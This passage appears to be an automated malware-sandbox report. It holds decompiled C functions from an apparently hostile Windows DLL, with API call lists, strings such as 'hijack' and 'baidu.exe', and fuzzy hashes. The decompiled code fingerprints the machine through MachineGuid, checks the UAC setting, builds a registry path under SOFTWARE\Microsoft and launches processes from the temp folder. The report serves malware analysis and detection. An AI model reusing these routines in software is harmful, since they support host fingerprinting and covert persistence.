                                                                                                                                                      0x1001a610
                                                                                                                                                      0x1001a611
                                                                                                                                                      0x1001a61e
                                                                                                                                                      0x1001a630
                                                                                                                                                      0x1001a635
                                                                                                                                                      0x1001a63c
                                                                                                                                                      0x1001a651
                                                                                                                                                      0x1001a667
                                                                                                                                                      0x1001a674
                                                                                                                                                      0x1001a67c
                                                                                                                                                      0x1001a67f
                                                                                                                                                      0x1001a685
                                                                                                                                                      0x1001a688
                                                                                                                                                      0x1001a68b
                                                                                                                                                      0x1001a68e
                                                                                                                                                      0x1001a691
                                                                                                                                                      0x1001a695
                                                                                                                                                      0x1001a6a5
                                                                                                                                                      0x1001a6b9
                                                                                                                                                      0x1001a6bc
                                                                                                                                                      0x1001a6c0
                                                                                                                                                      0x1001a6c9
                                                                                                                                                      0x1001a6d6
                                                                                                                                                      0x1001a6de
                                                                                                                                                      0x1001a6df
                                                                                                                                                      0x1001a6e4
                                                                                                                                                      0x1001a6ea
                                                                                                                                                      0x1001a6ef
                                                                                                                                                      0x1001a6f1
                                                                                                                                                      0x1001a6fb
                                                                                                                                                      0x1001a6fb
                                                                                                                                                      0x1001a707
                                                                                                                                                      0x1001a715
                                                                                                                                                      0x1001a71b
                                                                                                                                                      0x1001a725
                                                                                                                                                      0x1001a730
                                                                                                                                                      0x1001a73a

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A170: FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                        • Part of subcall function 1001A170: FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                      • String ID: .exe$baidu.exe
                                                                                                                                                      • API String ID: 3164538923-2273953317
                                                                                                                                                      • Opcode ID: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                      • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                      • Opcode Fuzzy Hash: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                      • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001FDC0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
				char _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				void* _t30;
				intOrPtr _t43;
				void* _t50;

				_t50 = __eflags;
				_t41 = __edi;
				_push(0xffffffff);
				_push(E10022ADF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t43;
				_v8 = 0;
				_v576 = 0;
				E1000CF20(__edi,  &_v575, 0, 0x103);
				_v312 = 0;
				E1000CF20(_t41,  &_v311, 0, 0x103);
				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
				GetTempPathA(0x104,  &_v576);
				_push(E100011E0( &_a4));
				_push(E100011E0( &_v44));
				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
				E1001A1D0(_t50,  &_v312); // executed
				E100011A0( &_v44);
				_v8 = 0xffffffff;
				_t30 = E100011A0( &_a4);
				 *[fs:0x0] = _v16;
				return _t30;
			}













                                                                                                                                                      0x1001fdc0
                                                                                                                                                      0x1001fdc0
                                                                                                                                                      0x1001fdc3
                                                                                                                                                      0x1001fdc5
                                                                                                                                                      0x1001fdd0
                                                                                                                                                      0x1001fdd1
                                                                                                                                                      0x1001fdde
                                                                                                                                                      0x1001fde5
                                                                                                                                                      0x1001fdfa
                                                                                                                                                      0x1001fe02
                                                                                                                                                      0x1001fe17
                                                                                                                                                      0x1001fe23
                                                                                                                                                      0x1001fe37
                                                                                                                                                      0x1001fe45
                                                                                                                                                      0x1001fe4e
                                                                                                                                                      0x1001fe62
                                                                                                                                                      0x1001fe71
                                                                                                                                                      0x1001fe7c
                                                                                                                                                      0x1001fe81
                                                                                                                                                      0x1001fe8b
                                                                                                                                                      0x1001fe93
                                                                                                                                                      0x1001fe9d

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s 200 %s
                                                                                                                                                      • API String ID: 3552933064-2772210913
                                                                                                                                                      • Opcode ID: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction ID: fa445e4306be4de550b1f58f9f77f959fb08a7f600bfac00d2f80f5c48e4b5e6
                                                                                                                                                      • Opcode Fuzzy Hash: c3d26593a62fb1594e39bc9ee517a8b38b6f03e22f0bfca02fd24b37d5fb5c36
                                                                                                                                                      • Instruction Fuzzy Hash: B01198B6C00208ABE714EB90DC56FDE777CEB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F990, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                      			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v275;
				char _v276;
				void* __ebp;
				void* _t20;
				void* _t37;

				_t37 = __eflags;
				_t28 = __edi;
				_v276 = 0;
				E1000CF20(__edi,  &_v275, 0, 0x103);
				_v12 = 0x104;
				E1001A2F0( &_v276,  &_v12); // executed
				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
				_t38 = _v8;
				if(_v8 != 0) {
					_push(_v8);
					return E1000CA30(__ebx, _t28, __esi, _t38);
				}
				return _t20;
			}










                                                                                                                                                      0x1001f990
                                                                                                                                                      0x1001f990
                                                                                                                                                      0x1001f999
                                                                                                                                                      0x1001f9ae
                                                                                                                                                      0x1001f9b6
                                                                                                                                                      0x1001f9c8
                                                                                                                                                      0x1001f9e1
                                                                                                                                                      0x1001f9f8
                                                                                                                                                      0x1001fa08
                                                                                                                                                      0x1001fa10
                                                                                                                                                      0x1001fa14
                                                                                                                                                      0x1001fa19
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001fa1f
                                                                                                                                                      0x1001fa25

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                        • Part of subcall function 1001A2F0: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                      • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                      • API String ID: 3138967372-3622423033
                                                                                                                                                      • Opcode ID: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                      • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                      • Opcode Fuzzy Hash: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                      • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001D240, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001D240() {
				void* _v8;
				int _v12;
				signed int _v16;
				int _v20;
				char _v24;
				long _t18;
				long _t21;

				_v12 = 4;
				_v20 = 4;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_t18 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0x20019,  &_v8); // executed
				if(_t18 == 0) {
					_t21 = RegQueryValueExW(_v8, L"EnableLUA", 0,  &_v12,  &_v24,  &_v20); // executed
					if(_t21 == 0) {
						_v16 = 0 | _v24 == 0x00000001;
					}
					RegCloseKey(_v8);
				}
				return _v16;
			}










                                                                                                                                                      0x1001d246
                                                                                                                                                      0x1001d24d
                                                                                                                                                      0x1001d254
                                                                                                                                                      0x1001d25b
                                                                                                                                                      0x1001d262
                                                                                                                                                      0x1001d27e
                                                                                                                                                      0x1001d286
                                                                                                                                                      0x1001d29f
                                                                                                                                                      0x1001d2a7
                                                                                                                                                      0x1001d2b2
                                                                                                                                                      0x1001d2b2
                                                                                                                                                      0x1001d2b9
                                                                                                                                                      0x1001d2b9
                                                                                                                                                      0x1001d2c5

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                      Strings
                                                                                                                                                      • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 1001D274
                                                                                                                                                      • EnableLUA, xrefs: 1001D296
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
                                                                                                                                                      • API String ID: 3677997916-2194944742
                                                                                                                                                      • Opcode ID: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction ID: 5282c0b80e2e5c01901b155bdceaa9b4f75acfd53aa6edd49772c4382101ddc9
                                                                                                                                                      • Opcode Fuzzy Hash: 266f08e0f126cb4b8deb597b18c5a4e6f0f9f98ecfb3ee9ea26cd0a9d97fb6d8
                                                                                                                                                      • Instruction Fuzzy Hash: EC01FFB5D00219FBEB04DFD1CD98BEEBBB8EB44305F108059E611BA280D7B59B04CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A2F0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37registryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A2F0(char* _a4, int* _a8) {
				void* _v8;
				int* _v12;
				long _t11;
				long _t13;

				_v12 = 0;
				_v8 = 0;
				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
				if(_t11 == 0) {
					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
					if(_t13 == 0) {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					return _v12;
				}
				return 0;
			}







                                                                                                                                                      0x1001a2f6
                                                                                                                                                      0x1001a2fd
                                                                                                                                                      0x1001a319
                                                                                                                                                      0x1001a321
                                                                                                                                                      0x1001a33c
                                                                                                                                                      0x1001a344
                                                                                                                                                      0x1001a34a
                                                                                                                                                      0x1001a34a
                                                                                                                                                      0x1001a355
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001a35b
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                      • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                      • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                      • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                      • API String ID: 3677997916-880526231
                                                                                                                                                      • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                      • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                      • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65registrytimeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				long _t27;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
				if(_t27 == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}












                                                                                                                                                      0x1001f4a6
                                                                                                                                                      0x1001f4ad
                                                                                                                                                      0x1001f4b4
                                                                                                                                                      0x1001f4ce
                                                                                                                                                      0x1001f4d6
                                                                                                                                                      0x1001f500
                                                                                                                                                      0x1001f502
                                                                                                                                                      0x1001f508
                                                                                                                                                      0x1001f50e
                                                                                                                                                      0x1001f514
                                                                                                                                                      0x1001f51a
                                                                                                                                                      0x1001f520
                                                                                                                                                      0x1001f526
                                                                                                                                                      0x1001f534
                                                                                                                                                      0x1001f540
                                                                                                                                                      0x1001f543
                                                                                                                                                      0x1001f554
                                                                                                                                                      0x1001f557
                                                                                                                                                      0x1001f557
                                                                                                                                                      0x1001f55e
                                                                                                                                                      0x1001f55e
                                                                                                                                                      0x1001f56d

                                                                                                                                                      APIs
                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3147484438-0
                                                                                                                                                      • Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
                                                                                                                                                      • Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
                                                                                                                                                      • Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61timefileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                      			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				int _t28;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				_t28 = PathFileExistsA(_a4); // executed
				if(_t28 != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}













                                                                                                                                                      0x1001f3d6
                                                                                                                                                      0x1001f3dd
                                                                                                                                                      0x1001f3e8
                                                                                                                                                      0x1001f3f0
                                                                                                                                                      0x1001f412
                                                                                                                                                      0x1001f419
                                                                                                                                                      0x1001f435
                                                                                                                                                      0x1001f43b
                                                                                                                                                      0x1001f441
                                                                                                                                                      0x1001f447
                                                                                                                                                      0x1001f44d
                                                                                                                                                      0x1001f453
                                                                                                                                                      0x1001f459
                                                                                                                                                      0x1001f467
                                                                                                                                                      0x1001f470
                                                                                                                                                      0x1001f476
                                                                                                                                                      0x1001f487
                                                                                                                                                      0x1001f48a
                                                                                                                                                      0x1001f48a
                                                                                                                                                      0x1001f419
                                                                                                                                                      0x1001f496

                                                                                                                                                      APIs
                                                                                                                                                      • PathFileExistsA.KERNELBASE(?), ref: 1001F3E8
                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
                                                                                                                                                      • GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
                                                                                                                                                      • __aulldiv.LIBCMT ref: 1001F482
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Time$CreateExistsPathSystem__aulldiv
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3038978132-0
                                                                                                                                                      • Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
                                                                                                                                                      • Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
                                                                                                                                                      • Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022AB3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280); // executed
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
